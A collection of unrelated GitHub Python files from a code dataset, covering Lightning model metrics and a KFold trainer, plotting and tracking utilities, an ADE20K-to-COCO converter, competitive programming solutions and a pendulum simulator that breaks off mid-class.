batch_parts[\"preds\"]\n        labels = batch_parts[\"labels\"]\n        for metric in self.metrics[\"train\"]:\n            metric.update(preds, labels)\n        self.train_auc.update(F.one_hot(preds, len(self.hparams.classes)).type(torch.float32).to(preds.get_device()), labels)\n        return batch_parts[\"loss\"]\n\n    def training_epoch_end(self, outputs):\n        cm = self.train_ac.compute()\n        f1 = self.train_f1.compute()\n        precision = self.train_p.compute()\n        auc = self.train_auc.compute()\n\n        log = {}\n        for c in self.hparams.classes:\n            log[f\"train_accuracy_\" + c[0]] = cm[c[1]]\n            log[f\"train_precision_\" + c[0]] = precision[c[1]]\n\n        log[\"train_f1\"] = f1\n        log[\"train_auc\"] = auc\n        log[\"train_loss\"] = outputs[-1]\n        self.log_dict(log, sync_dist=True, on_epoch=True, prog_bar=True, logger=True)\n        for metric in self.metrics[\"train\"]:\n            metric.reset()\n        
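# train_auc is updated outside the self.metrics dict (it takes one-hot inputs), so it is reset explicitly here rather than in the loop above\n        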
self.train_auc.reset()\n\n def validation_step(self, batch, batch_idx):\n return self._calculate_loss(batch)\n\n def validation_step_end(self, batch_parts):\n preds = batch_parts[\"preds\"]\n labels = batch_parts[\"labels\"]\n for metric in self.metrics[\"val\"]:\n metric.update(preds, labels)\n self.val_auc.update(F.one_hot(preds, len(self.hparams.classes)).type(torch.float32).to(preds.get_device()),\n labels)\n return batch_parts[\"loss\"]\n\n def validation_epoch_end(self, outputs):\n cm = self.val_ac.compute()\n f1 = self.val_f1.compute()\n precision = self.val_p.compute()\n auc = self.val_auc.compute()\n\n log = {}\n for c in self.hparams.classes:\n log[f\"val_accuracy_\" + c[0]] = cm[c[1]]\n log[f\"val_precision_\" + c[0]] = precision[c[1]]\n\n log[\"val_f1\"] = f1\n log[\"val_auc\"] = auc\n log[\"val_loss\"] = outputs[-1]\n self.log_dict(log, sync_dist=True, on_epoch=True, prog_bar=True, logger=True)\n for metric in self.metrics[\"val\"]:\n metric.reset()\n self.val_auc.reset()\n\n def test_step(self, batch, batch_idx):\n return self._calculate_loss(batch)\n\n def test_step_end(self, batch_parts):\n preds = batch_parts[\"preds\"]\n labels = batch_parts[\"labels\"]\n for metric in self.metrics[\"test\"]:\n metric.update(preds, labels)\n self.test_auc.update(F.one_hot(preds, len(self.hparams.classes)).type(torch.float32).to(preds.get_device()),\n labels)\n return batch_parts[\"loss\"]\n\n def test_epoch_end(self, outputs):\n cm = self.test_ac.compute()\n f1 = self.test_f1.compute()\n precision = self.test_p.compute()\n auc = self.test_auc.compute()\n\n log = {}\n for c in self.hparams.classes:\n log[f\"test_accuracy_\" + c[0]] = cm[c[1]]\n log[f\"test_precision_\" + c[0]] = precision[c[1]]\n\n log[\"test_f1\"] = f1\n log[\"test_auc\"] = auc\n log[\"test_loss\"] = outputs[-1]\n self.log_dict(log, sync_dist=True, on_epoch=True, prog_bar=True, logger=True)\n for metric in self.metrics[\"test\"]:\n metric.reset()\n self.test_auc.reset()","repo_name":"sinagh72/contrastive-learning","sub_path":"models/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40246567497","text":"\"\"\"\nFilename: find_radii.py\n-----------------------\n# TODO fix this\nThis is broken. 
\n\nBy: Marcus Forst\n\"\"\"\n\nimport os, time\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nfrom src.tools.load_csv_list import load_csv_list\nfrom src.tools.parse_path import parse_vid_path\n\n\nPIX_UM = 1.74\n\ndef plot_box_swarm(data, x_labels, y_axis_label, plot_title, figure_name, verbose = True, write = False, remove_outliers = False):\n \"\"\"Plot box-plot and swarm plot for data list.\n \n Args:\n data (list of list): List of lists with data to be plotted.\n y_axis_label (str): Y- axis label.\n x_labels (list of str): List with labels of x-axis.\n plot_title (str): Plot title.\n figure_name (str): Path to output figure.\n \n \"\"\"\n if remove_outliers:\n # # Remove outliers using the clip function\n # data_clipped, outliers = select_outliers(data)\n # # initialize plot information:\n # sns.set(color_codes=True)\n # plt.figure(1, figsize=(9, 6))\n # plt.title(plot_title)\n\n # # Create box and swarm plot with clipped data\n # ax = sns.boxplot(data=data_clipped)\n # sns.swarmplot(data=data_clipped, color=\".25\")\n # sns.swarmplot(data = outliers, color = \"red\")\n # if verbose: plt.show()\n pass\n else:\n # initialize plot information:\n sns.set(color_codes=True)\n plt.figure(1, figsize=(9, 6))\n plt.title(plot_title)\n \n # plot data on swarmplot and boxplot\n ax = sns.boxplot(data=data)\n sns.swarmplot(data=data, color=\".25\")\n \n # y-axis label\n ax.set(ylabel=y_axis_label)\n \n # write labels with number of elements\n ax.set_xticks(np.arange(len(data)), labels = x_labels)\n ax.legend()\n \n if write:\n # write figure file with quality 400 dpi\n plt.savefig(figure_name, bbox_inches='tight', dpi=400)\n if verbose: plt.show()\n else: plt.close()\n if verbose: plt.show()\n return 0\n\ndef main(path = 'C:\\\\Users\\\\gt8mar\\\\capillary-flow\\\\data\\\\part11\\\\230427\\\\vid01',\n write = True, verbose = False):\n input_folder = os.path.join(path, \"E_centerline\", \"coords\")\n output_folder = os.path.join(path, \"E_centerline\", \"images\")\n participant, date, video, file_prefix = parse_vid_path(path)\n skeleton_data = load_csv_list(input_folder, dtype=float)\n # load radii from skeleton data\n radii = [array[:, 2] for array in skeleton_data] # note that the radii will be row vectors\n medians = []\n means = []\n for capillary in radii:\n median = np.median(capillary) * 2 /PIX_UM\n mean = np.mean(capillary) *2/PIX_UM\n medians.append(median)\n means.append(mean)\n plot_box_swarm([medians, means], x_labels = [\"medians\", \"means\"], y_axis_label=\"diameter (um)\", \n plot_title=f\"{file_prefix} capillary diameters\", figure_name=\"figure 1\",\n write=True)\n return np.mean(means)\n\n\"\"\"\n-----------------------------------------------------------------------------\n\"\"\"\n# This provided line is required at the end of a Python file\n# to call the main() function.\nif __name__ == \"__main__\":\n ticks = time.time()\n means = []\n # for i in range(1,9):\n # sample = 'sample_' + str(i).zfill(3)\n # mean = main(\"set_01\", sample, write = False, verbose=False)\n # means.append(mean)\n # plt.plot(means)\n # plt.show() \n main(path = '/hpc/projects/capillary-flow/data/part11/230427/vid01', write = True, verbose = False) \n print(\"--------------------\")\n print(\"Runtime: \" + str(time.time() - ticks))\n","repo_name":"gt8mar/capillary-flow","sub_path":"src/find_radii.py","file_name":"find_radii.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} 
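# Added aside (illustration only, not part of either record): find_radii.py above converts skeleton
# radii in pixels to diameters in micrometers via d = 2 * r / PIX_UM; assuming PIX_UM = 1.74 is pixels per micrometer, a 10 px radius gives 2 * 10 / 1.74 ≈ 11.49 um.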
+{"seq_id":"74118526170","text":"# https://www.acmicpc.net/problem/1806\n\"\"\"\n10 < N < 100,000\nN 자리수로 만들어진 수열의 부분합중 그 합이 S 이상이 되는 것 중, 가장 짧은 것의 길이를 구하라\n\"\"\"\nimport math\n\nif __name__ == \"__main__\":\n\n n, s = map(int, input().split())\n sequence = list(map(int, input().split()))\n\n prefix_sum = [0]\n\n for i in range(0, n):\n prefix_sum.append(prefix_sum[i] + sequence[i])\n\n # 여기서 two pointer\n left = right = 0\n answer = math.inf\n while left < n:\n sum_value = prefix_sum[right] - prefix_sum[left]\n if sum_value >= s:\n answer = min(answer, right - left)\n # right == left 일때는 0이라서 left가 right를 넘어설 일이 없다.\n left += 1\n elif sum_value < s:\n if right == n:\n break\n right += 1\n if s == 0:\n print(1)\n else:\n print(0 if answer == math.inf else answer)\n\"\"\"\n10 100\n5 1 3 5 10 7 4 9 2 8\n\"\"\"","repo_name":"ekzm8523/CodingTestPractice","sub_path":"python/samsung_tutorial/basic_algorithm/1806.py","file_name":"1806.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29609285212","text":"import cv2\nimport os\n\nVIDEO_FORMATS = [\".mp4\", \".avi\",]\nIMAGE_FORMATS = [\".png\", \".jpg\", \".jpeg\"]\nCOLORS = [(255,0,0), (0,255,0), (0,0,255), (255,255,0), (0,255,255), (255,0,255), (0,128,0), (128,0,128), (245,222,179)]\n\ndef make_tracks(frame_results):\n tracks = {}\n\n for idx, frame_result in enumerate(frame_results):\n for result in frame_result:\n track_id = result[1]\n item = {\n \"frame_idx\": idx,\n \"confidence\": result[2],\n \"bbox\": result[3:6],\n \"class\": result[0],\n }\n if track_id not in tracks:\n tracks[track_id] = [item]\n else:\n tracks[track_id].append(item)\n\n return tracks\n\ndef join_tracks(tracks, identities):\n print(tracks.keys())\n print(identities)\n new_tracks = {}\n unknown_count = 0\n for track_id in tracks.keys():\n print(track_id)\n if track_id in identities:\n identity = identities[track_id]\n print(identity)\n if identity in new_tracks:\n # ugly validation for testint purposes\n for f in tracks[track_id]:\n for f2 in new_tracks[identity]:\n if f[\"frame_idx\"] == f2[\"frame_idx\"]:\n print(f)\n print(f2)\n raise Exception(\"Duplicate individual detected\")\n new_tracks[identity] += tracks[track_id]\n else:\n new_tracks[identity] = tracks[track_id]\n else:\n new_tracks[f\"unknown-{unknown_count}\"] = tracks[track_id]\n unknown_count += 1\n\n return new_tracks\n\ndef is_img(file_path):\n return os.path.splitext(file_path)[1].lower() in IMAGE_FORMATS\n\ndef is_video(file_path):\n return os.path.splitext(file_path)[1].lower() in VIDEO_FORMATS\n\ndef contains_video(file_paths):\n return any(is_video(file_path) for file_path in file_paths)\n\ndef draw_label(img, bbox, identity, color):\n cv2.rectangle(img, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), color, 3)\n cv2.rectangle(img, (int(bbox[0]), int(bbox[1]-30)), (int(bbox[0])+(len(\"Gorilla\")+len(str(identity)))*17, int(bbox[1])), color, -1)\n cv2.putText(img, \"Gorilla\" + \" : \" + str(identity),(int(bbox[0]), int(bbox[1]-11)),0, 1.2, (255,255,255),2, lineType=cv2.LINE_AA) \n\n ","repo_name":"Lasklu/gorillavision","sub_path":"reid-system/prediction_utils.py","file_name":"prediction_utils.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"11751827983","text":"import json\nimport numpy as np\nimport cv2\nfrom coco.coco import *\nimport pycocotools.mask as mask\nfrom glob 
import glob\nimport matplotlib.pyplot as plt\nimport random\nimport os\n\nSUPER_CLASS = \"background\"\nCLASS_NAME = \"ground\"\nDISPLAY_CLASS_NAMES = [\"ground\", \"grass\"]\nLOWER_CLASS_COLORS = [(0, 70, 30), (0, 101, 40)]\nUPPER_CLASS_COLORS = [(256, 70, 30), (256, 101, 40)]\n\n# SUPER_CLASS = \"background\"\n# CLASS_NAME = \"sea\"\n# DISPLAY_CLASS_NAMES = [\"sea\"]\n# LOWER_CLASS_COLORS = [(0, 216, 80)]\n# UPPER_CLASS_COLORS = [(130, 216, 80)]\n\n# SUPER_CLASS = \"background\"\n# CLASS_NAME = \"ground\"\n# DISPLAY_CLASS_NAMES = [\"sky\"]\n# LOWER_CLASS_COLORS = [(0, 116, 90)]\n# UPPER_CLASS_COLORS = [(80, 116, 90)]\n\nMODE = \"train\"\n# MODE = \"val\"\n\nCOCO_IMAGES_DIR_PATH = 'datasets/ADE20K_2016_07_26/coco_{}_images'.format(MODE)\n\nif not os.path.exists(COCO_IMAGES_DIR_PATH):\n os.mkdir(COCO_IMAGES_DIR_PATH)\n\nwith open(\"datasets/coco_annotations/instances_{}2017.json\".format(MODE)) as coco_json_file:\n json_data = json.load(coco_json_file)\n coco = Coco(json_data)\n\n labels_info = []\n DIR = \"training\"\n if MODE == \"train\":\n DIR = \"training\"\n else:\n DIR = \"validation\"\n mask_image_file_paths = glob('datasets/ADE20K_2016_07_26/images/{}/*/*/*_seg.png'.format(DIR))\n # mask_image_file_paths.sort()\n\n category_id = coco.get_category_id(CLASS_NAME)\n if category_id == -1:\n category_id = coco.add_category(SUPER_CLASS, CLASS_NAME)\n\n for mask_image_file_path in mask_image_file_paths:\n dir_list = mask_image_file_path.split('/')\n alphabet = dir_list[-3]\n word = dir_list[-2]\n filename_prefix = dir_list[-1]\n filename_prefix = filename_prefix.split('_seg.png')[0]\n origin_image_file_path = 'datasets/ADE20K_2016_07_26/images/{}/{}/{}/{}.jpg'.format(\n DIR, alphabet, word, filename_prefix)\n attribute_file_path = 'datasets/ADE20K_2016_07_26/images/{}/{}/{}/{}_atr.txt'.format(\n DIR, alphabet, word, filename_prefix)\n\n has_class = False\n with open(attribute_file_path) as attribute_file:\n while True:\n line_str = attribute_file.readline()\n if not line_str:\n break\n\n data_list = line_str.split(\" # \")\n for display_class_name in DISPLAY_CLASS_NAMES:\n if data_list[3] == display_class_name or data_list[4] == display_class_name:\n has_class = True\n break\n\n if not has_class:\n continue\n\n filename = origin_image_file_path.split('/')[-1]\n im = cv2.imread(origin_image_file_path)\n\n if im is None:\n print(\"im is None\", origin_image_file_path)\n continue\n\n origin_mask_image = cv2.imread(mask_image_file_path)\n # hsv = cv2.cvtColor(origin_mask_image, cv2.COLOR_BGR2HSV)\n mask_all = np.zeros([origin_mask_image.shape[0], origin_mask_image.shape[1]])\n for i in range(len(LOWER_CLASS_COLORS)):\n img_mask = cv2.inRange(origin_mask_image, LOWER_CLASS_COLORS[i], UPPER_CLASS_COLORS[i])\n mask_all = np.clip(mask_all + img_mask, 0, 255)\n mask_all = mask_all.astype('uint8')\n img_result = cv2.bitwise_and(origin_mask_image, origin_mask_image, mask=mask_all)\n mask_image = cv2.cvtColor(img_result, cv2.COLOR_BGR2GRAY)\n _, mask_image = cv2.threshold(mask_image, 1, 255, 0)\n\n # plt.subplot(2, 2, 1)\n # plt.title(filename_prefix)\n # plt.imshow(im)\n # plt.subplot(2, 2, 2)\n # plt.imshow(origin_mask_image)\n # plt.subplot(2, 2, 3)\n # plt.imshow(img_result)\n # plt.subplot(2, 2, 4)\n # plt.imshow(mask_image, 'gray')\n # plt.show()\n\n contours, hierarchy = cv2.findContours(mask_image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n segmentation = []\n for contour in contours:\n contour = contour.flatten().tolist()\n if len(contour) > 4:\n segmentation.append(contour)\n if 
len(segmentation) == 0:\n            continue\n\n        rle = mask.encode(np.asfortranarray(mask_image))\n        area = mask.area(rle)\n        bbox = mask.toBbox(rle)\n\n        id = coco.find_image_id_by_filename(filename)\n\n        # if coco does not already have this file, add the image to coco\n        if id == -1:\n            id = coco.get_new_image_id()\n            coco.add_image(1, filename, None, im.shape[0], im.shape[1], None, None, id)\n            print('{} is created'.format(filename))\n        else:\n            print('{} already exists'.format(filename))\n\n        print('add annotation', origin_image_file_path)\n        coco.add_annotation(segmentation, area, 0, id, [int(v) for v in bbox], category_id)\n\n        dst_path = \"{}/{}\".format(COCO_IMAGES_DIR_PATH, filename)\n        if not os.path.exists(dst_path):\n            op = \"cp {} {}\".format(origin_image_file_path, dst_path)\n            os.system(op)\n\n    print('Writing...')\n    f = open(\"{}_annotation.json\".format(MODE), \"w\")\n    f.write(str(coco))\n    f.close()\n    print('Done!')\n\n","repo_name":"kyoodong/Tryangle-Research","sub_path":"DataFormatConverter/ade20k.py","file_name":"ade20k.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33595577556","text":"import os.path as osp\nfrom typing import Any, List, Optional, Sequence, Union\n\nimport torch\nfrom lightning.pytorch import LightningDataModule, LightningModule, Trainer\nfrom lightning.pytorch.utilities import rank_zero_info\nfrom lightning.pytorch.utilities.model_helpers import is_overridden\nfrom torch.utils.data import DataLoader\n\nfrom pl_crossvalidate.datamodule import KFoldDataModule\nfrom pl_crossvalidate.ensemble import EnsembleLightningModule\n\n\nclass KFoldTrainer(Trainer):\n    \"\"\"Trainer for KFold cross validation.\n\n    This trainer is a plug-in replacement for the `Trainer` class from the `lightning` package. It does not alter any of\n    the existing functionality, only extends it with the ability to perform KFold cross validation. In total three\n    new public methods are added:\n\n    - `cross_validate`: Performs KFold cross validation on a given model\n    - `create_ensemble`: Creates an ensemble model from a list of trained models\n    - `out_of_sample_score`: Computes the out-of-sample score for a given model\n\n    The latter two methods are intended to be called after the `cross_validate` method has been called.\n\n    Args:\n        num_folds: Number of folds\n        shuffle: Whether to shuffle the data before splitting it into folds\n        stratified: Whether to use stratified sampling e.g. 
for classification we make sure that each fold has the same\n ratio of samples from each class as the original dataset\n args: Arguments passed to the underlying lightning `Trainer` class\n kwargs: Keyword arguments passed to the underlying lightning `Trainer` class\n \"\"\"\n\n def __init__(self, num_folds: int = 5, shuffle: bool = False, stratified: bool = False, *args, **kwargs) -> None:\n # Input validation for the cross validation arguments\n if not isinstance(num_folds, int) or num_folds < 2:\n raise ValueError(\"Expected argument `num_folds` to be an integer larger than or equal to 2\")\n self.num_folds = num_folds\n if not isinstance(shuffle, bool):\n raise ValueError(\"Expected argument `shuffle` to be an boolean\")\n self.shuffle = shuffle\n if not isinstance(stratified, bool):\n raise ValueError(\"Expected argument `stratified` to be an boolean\")\n self.stratified = stratified\n\n # Intialize rest of the trainer\n super().__init__(*args, **kwargs)\n self._version = self.logger.version\n\n def _construct_kfold_datamodule(\n self,\n train_dataloader: Optional[DataLoader] = None,\n val_dataloaders: Optional[Union[DataLoader, Sequence[DataLoader]]] = None,\n datamodule: Optional[Union[LightningDataModule, KFoldDataModule]] = None,\n ) -> KFoldDataModule:\n return KFoldDataModule(\n self.num_folds,\n self.shuffle,\n self.stratified,\n train_dataloader=train_dataloader,\n val_dataloaders=val_dataloaders,\n datamodule=datamodule,\n )\n\n @property\n def log_dir(self) -> Optional[str]:\n \"\"\"Overwrite default method until https://github.com/Lightning-AI/lightning/issues/17168 is resolved.\"\"\"\n if len(self.loggers) > 0:\n dirpath = self.logger.log_dir\n else:\n dirpath = self.default_root_dir\n\n dirpath = self.strategy.broadcast(dirpath)\n return dirpath\n\n def cross_validate(\n self,\n model: LightningModule,\n train_dataloader: Optional[DataLoader] = None,\n val_dataloaders: Optional[Union[DataLoader, Sequence[DataLoader]]] = None,\n datamodule: Optional[Union[LightningDataModule, KFoldDataModule]] = None,\n ) -> List[Any]:\n \"\"\"Performs KFold cross validation on a given model.\n\n This is the core method added by this class. Given a model and a dataloader / datamodule it will automatically\n perform KFold cross validation. 
By automatically we mean that it will automatically construct the different\n folds and sequentially train and validate the model on each fold, resetting the model weights between each fold.\n\n Args:\n model: The model to perform cross validation on\n train_dataloader: Dataloader with training samples\n val_dataloaders: Dataloader with validation samples, can be a list of dataloaders for multiple validation\n datamodule: Lightning datamodule (exclusive with `train_dataloader` and `val_dataloader`)\n \"\"\"\n if not is_overridden(\"test_step\", model, LightningModule):\n raise ValueError(\"`cross_validation` method requires you to also define a `test_step` method.\")\n\n # construct K fold datamodule if user is not already passing one in\n if not isinstance(datamodule, KFoldDataModule):\n datamodule = self._construct_kfold_datamodule(train_dataloader, val_dataloaders, datamodule)\n self._kfold_datamodule = datamodule\n\n # checkpoint to restore from\n # this is a bit hacky because the model needs to be saved before the fit method\n self.strategy._lightning_module = model\n path = osp.join(self.log_dir, \"kfold_initial_weights.ckpt\")\n self.save_checkpoint(path)\n self.strategy._lightning_module = None\n\n # run cross validation\n results, paths = [], []\n for i in range(self.num_folds):\n self._set_fold_index(i, datamodule=datamodule)\n rank_zero_info(f\"===== Starting fold {i+1}/{self.num_folds} =====\")\n self.fit(model=model, datamodule=datamodule, ckpt_path=path)\n\n fold_path = osp.join(self.log_dir, f\"fold_{i}.ckpt\")\n self.save_checkpoint(fold_path)\n paths.append(fold_path)\n\n res = self.test(model=model, datamodule=datamodule, verbose=False)\n results.append(res)\n\n self._ensemple_paths = paths\n return results\n\n def _set_fold_index(self, fold_index: int, datamodule: KFoldDataModule) -> None:\n # any logger need to be reset to the new fold index and the privious experiment needs to be cleared\n if self.loggers is not None:\n for logger in self.loggers:\n if hasattr(logger, \"_version\"):\n if not hasattr(logger, \"_orig_version\"):\n logger._orig_version = (\n logger._version if isinstance(logger._version, str) else f\"version_{logger._version}\"\n )\n logger._version = logger._orig_version\n new_version = f\"{logger._version}/fold_{fold_index}\" if logger._version else f\"fold_{fold_index}\"\n logger._version = new_version\n if hasattr(logger, \"_experiment\"):\n logger._experiment = None\n\n # set the fold index for the datamodule\n datamodule.fold_index = fold_index\n\n def create_ensemble(self, model: LightningModule, ckpt_paths: Optional[List[str]] = None) -> LightningModule:\n \"\"\"Create an ensemble from trained models.\n\n Args:\n model: An instance of the model to create an ensemble over.\n ckpt_paths: If not provided, then it assumes that `cross_validate` have been already called\n and will automatically load the model checkpoints saved during that process. Else expect\n it to be a list of checkpoint paths to individual models.\n\n Example:\n >>> trainer = Trainer()\n >>> trainer.cross_validate(model, datamodule)\n >>> ensemble_model = trainer.create_ensemble(model)\n\n \"\"\"\n if ckpt_paths is None:\n if hasattr(self, \"_ensemple_paths\"):\n ckpt_paths = self._ensemple_paths\n else:\n raise ValueError(\n \"Cannot construct ensemble model. 
Either call `cross_validate`\"\n                    \"beforehand or pass in a list of checkpoint paths in the `ckpt_paths` argument\"\n                )\n        return EnsembleLightningModule(model, ckpt_paths)\n\n    def out_of_sample_score(\n        self,\n        model: LightningModule,\n        datamodule: Optional[KFoldDataModule] = None,\n        ckpt_paths: Optional[List[str]] = None,\n    ) -> LightningModule:\n        \"\"\"Performs out of sample scoring for a given set of KFold trained models.\n\n        Out of sample scoring for K-fold refers to predicting on the test fold of each K-fold model.\n\n        Args:\n            model: The model to perform cross validation on\n            datamodule: Optionally a ``KFoldDataModule`` instance. If not provided, then it assumes that\n                `cross_validate` has already been called and will automatically use the same ``KFoldDataModule`` used\n                during that process.\n            ckpt_paths: If not provided, then it assumes that `cross_validate` has already been called\n                and will automatically load the model checkpoints saved during that process. Else expect\n                it to be a list of checkpoint paths to individual models.\n        \"\"\"\n        score_method = getattr(model, \"score\", None)\n        if not callable(score_method):\n            raise ValueError(\"`out_of_sample_score` method requires you to also define a `score` method.\")\n\n        if ckpt_paths is None:\n            if hasattr(self, \"_ensemple_paths\"):\n                ckpt_paths = self._ensemple_paths\n            else:\n                raise ValueError(\n                    \"Cannot construct ensemble model. Either call `cross_validate`\"\n                    \"beforehand or pass in a list of checkpoint paths in the `ckpt_paths` argument\"\n                )\n\n        if datamodule is None:\n            if not hasattr(self, \"_kfold_datamodule\"):\n                raise ValueError(\n                    \"Cannot compute out of sample scores. Either call `cross_validate` method before\"\n                    \"`out_of_sample_score` method, or provide an instance of `KFoldDataModule` in the `datamodule`\"\n                    \"argument.\"\n                )\n            else:\n                datamodule = self._kfold_datamodule\n        elif not isinstance(datamodule, KFoldDataModule):\n            raise ValueError(\"`datamodule` argument must be an instance of `KFoldDataModule`.\")\n\n        if len(ckpt_paths) != datamodule.num_folds:\n            raise ValueError(\"Number of checkpoint paths provided does not match the number of folds in the datamodule\")\n\n        # temporarily replace the predict_step method with the score method to use the trainer.predict method\n        _orig_predict_method = model.predict_step\n        model.predict_step = model.score\n\n        # run prediction on each fold\n        outputs = []\n        for i, ckpt_path in enumerate(ckpt_paths):\n            self._set_fold_index(i, datamodule=datamodule)\n            # load this fold's weights in place (load_from_checkpoint is a classmethod that returns a\n            # new module, which would silently discard the predict_step patch above)\n            model.load_state_dict(torch.load(ckpt_path)[\"state_dict\"])\n            out = self.predict(model=model, dataloaders=datamodule.test_dataloader())\n            outputs.append(torch.cat(out, 0))\n        model.predict_step = _orig_predict_method\n\n        # reorder to match the order of the dataset\n        test_indices = torch.cat([torch.tensor(test) for _, test in datamodule.splits])\n        outputs = torch.cat(outputs, 0)\n        return outputs[test_indices.argsort()]\n","repo_name":"SkafteNicki/pl_crossvalidate","sub_path":"pl_crossvalidate/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":11251,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"32"} +{"seq_id":"7326761758","text":"'''\r\nLeetCode 1029. 
Two City Scheduling\r\nhttps://leetcode.com/problems/two-city-scheduling/\r\n\r\nAnswers from here ⬇ \r\n- https://www.youtube.com/watch?v=OkJ1aHjAQr8\r\n- https://www.geeksforgeeks.org/python-sort-list-according-second-element-sublist/\r\n- https://stackoverflow.com/questions/4183506/python-list-sort-in-descending-order\r\n'''\r\nclass Solution:\r\n    def twoCitySchedCost(self, costs: List[List[int]]) -> int:\r\n        ctr_a = 0\r\n        ctr_b = 0\r\n        a = 0\r\n        n = len(costs)\r\n        \r\n        for i, c in enumerate(costs):\r\n            costs[i].append(abs(costs[i][0] - costs[i][1]))\r\n        \r\n        # costs = sorted(costs, key = lambda x: x[2])[::-1]\r\n        \r\n        costs = sorted(costs, key = lambda x: x[2], reverse=True)\r\n        \r\n        for i, c in enumerate(costs):\r\n            if ctr_a < n and ctr_b < n:\r\n                if costs[i][0] < costs[i][1]:\r\n                    ctr_a += 2\r\n                    a += costs[i][0]\r\n                elif costs[i][1] < costs[i][0]:\r\n                    ctr_b += 2\r\n                    a += costs[i][1]\r\n            \r\n            elif ctr_a < n:\r\n                ctr_a += 2\r\n                a += costs[i][0]\r\n            \r\n            else:\r\n                ctr_b += 2\r\n                a += costs[i][1]\r\n        \r\n        return a\r\n    ","repo_name":"RaglandCodes/Algos","sub_path":"Two City Scheduling.py","file_name":"Two City Scheduling.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36435383478","text":"# Please write your code inside the function stub below.\nimport math as m\n\n\ndef solution(n, c):\n    print(c)\n    c_array=[]\n    for tup in c:\n        c_array.append(list(tup))\n    c=c_array\n    count=0\n    change=True\n    while(change):\n        print(c)\n        \n        tempc=[]\n        for i in range(count+1):\n            tempc.append(c[i])\n        for j in range(count+1,len(c)):\n            other=1\n            added=False\n            for k in c[j]:\n                if k in tempc[count]:\n                    tempc.append(c[j][other])\n                    added=True\n                    break\n                else:\n                    other -= 1\n            if not added:\n                tempc.append(c[j])\n        if tempc[count]==c[count]:\n            count+=1\n        c=tempc\n        if count==len(c):\n            change=False\n    combinations=1\n    for a in c:\n        combinations*=m.factorial(len(a))\n    return combinations%(pow(10,9)+7)\n\n    ","repo_name":"Jibbajabbafic/AdventOfCode2018","sub_path":"1down.py","file_name":"1down.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34482475852","text":"import os\nimport utils\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom functools import partial\nfrom scipy import io\n\n'''\nThis is a script that simulates the movement of a variable-length pendulum.\nequation of motion:\n\nphi_ddot = [-2 * L_dot * phi_dot - g * sin(phi)] / L\n\nThe stabilization of this variable length pendulum is realized via the simple feedback control of the pendulum length. \nThe feedback control rule has the following form:\n\nL = L0 * (1 + delta * phi * phi_dot)\n\nReferences lead to: \nBewley(2020) Stabilization of low-altitude balloon systems, Part 1: rigging with a single taut ground tether, \nwith analysis as a variable-length pendulum\n\n=====================================\nAuthor : Muhan Zhao\nDate : Oct. 16, 2019\nLocation: UC San Diego, La Jolla, CA\n=====================================\n'''\n\n\nclass Pendulum:\n    \"\"\"\n    Oscillating Pendulum Simulator: including a novel feedback rule to stabilize the pendulum regardless of the\n    parameters {m, g, L0} and the exact expression of the oscillating angle.\n\n    Parameters\n    ------------\n\n    :param wave : dict, including parameters:\n        :keys frequency : float, the frequency of the oscillating angle\n
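        (the wave arrays below describe the pre-control oscillation that seeds the simulation)\n        :keys phi : array, the values of the oscillating angle w.r.t. 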
time\n        :keys dphi : array, the values of the oscillating angle's first-order derivative w.r.t. time\n        :keys ddphi : array, the values of the oscillating angle's second-order derivative w.r.t. time\n\n    :param attributes : dict, including parameters:\n        :keys max_t : float, the maximum time length, default 30\n        :keys dt : float, the marching time step, default 0.001\n        :keys adaptive_mode : bool, whether the adaptive control mode is on\n        :keys delta_adaptive_const : float, the parameter C for adaptive delta, default 0.15\n        :keys asymptotic_mode : bool, whether the asymptotic control mode is on\n        :keys delta_asymptotic_const : float, the value of delta for the feedback rule, default 0.2\n        :keys l0 : float, initial length of pendulum, default 1\n        :keys Lmax : float, maximum length of pendulum, default l0*1.2\n        :keys Lmin : float, minimum length of pendulum, default l0*.8\n        :keys Ldotmax : float, maximum derivative of pendulum length, default 5\n        :keys Ldotmin : float, minimum derivative of pendulum length, default -5\n        :keys save_fig : bool, whether to save the figures\n        :keys show_fig : bool, whether to display the figures\n        :keys format_fig : string, fig format to be saved\n\n    ------------\n\n    Methods\n    ------------\n\n    :method free_pendulum_oscillation\n    :method asymptotic_control_pendulum_oscillation\n    :method adaptive_control_pendulum_oscillation\n    ------------\n    \"\"\"\n    def __init__(self, wave, attributes):\n        self.max_t = attributes.get('max_t', 30)\n        self.dt = attributes.get('dt', 0.001)\n\n        # steps: the number of time slices of control inputs\n        # Note: even when max_t / dt is mathematically an integer, floating-point\n        # storage can leave a tiny error such as 1e-10 in the quotient.\n        # That's why we round here.\n        self.steps = int(round(self.max_t / self.dt))\n        self.time = np.linspace(0, self.max_t, self.steps)\n\n        self.l0 = attributes.get('l0', 1)\n        self.Ldotmax = attributes.get('Ldotmax', 5)\n        self.Ldotmin = attributes.get('Ldotmin', -5)\n\n        self.Lmax = attributes.get('Lmax', 1.2 * self.l0)\n        self.Lmin = attributes.get('Lmin', .8 * self.l0)\n\n        self.g = attributes.get('g', 9.8)\n        self.m = attributes.get('m', 1)\n\n        self.wave_phi = np.atleast_1d(wave['phi'])\n        self.wave_dphi = np.atleast_1d(wave['dphi'])\n\n        